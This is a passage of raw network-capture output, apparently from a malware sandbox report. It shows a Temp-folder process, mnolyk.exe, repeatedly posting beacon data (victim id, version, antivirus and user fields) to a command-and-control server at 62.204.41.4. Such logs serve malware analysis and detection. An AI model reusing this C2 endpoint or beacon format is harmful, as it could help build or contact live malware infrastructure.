                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      352192.168.2.75008062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:35.199980974 CET812OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:35.266577959 CET812INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      353192.168.2.75008162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:35.445260048 CET813OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:35.510221958 CET813INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      354192.168.2.75008262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:35.692289114 CET814OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:35.761848927 CET814INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      355192.168.2.75008362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:35.944830894 CET815OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:36.011137009 CET815INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      356192.168.2.75008462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:36.184166908 CET816OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:36.250062943 CET816INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      357192.168.2.75008562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:36.424990892 CET817OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:36.505920887 CET817INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      358192.168.2.75008662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:36.704777002 CET818OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:36.768732071 CET818INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      359192.168.2.75008762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:36.937901020 CET819OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.001657009 CET819INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      36192.168.2.74976062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:06.332166910 CET467OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:06.398762941 CET468INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      360192.168.2.75008862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:37.171595097 CET820OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.239892006 CET820INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      361192.168.2.75008962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:37.423383951 CET821OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.487719059 CET821INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      362192.168.2.75009062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:37.652978897 CET822OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.717353106 CET822INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      363192.168.2.75009162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:37.888526917 CET823OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.953670025 CET823INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      364192.168.2.75009262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:38.122805119 CET824OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:38.188714027 CET824INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      365192.168.2.75009362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:38.357594013 CET825OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:38.421977997 CET825INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      366192.168.2.75009462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:38.590483904 CET826OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:38.656254053 CET826INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      367192.168.2.75009562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:38.824933052 CET827OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:38.888752937 CET827INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      368192.168.2.75009662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:39.062078953 CET828OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:39.127321959 CET828INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      369192.168.2.75009762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:39.294548035 CET829OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:39.360487938 CET829INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      37192.168.2.74976162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:06.571219921 CET469OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
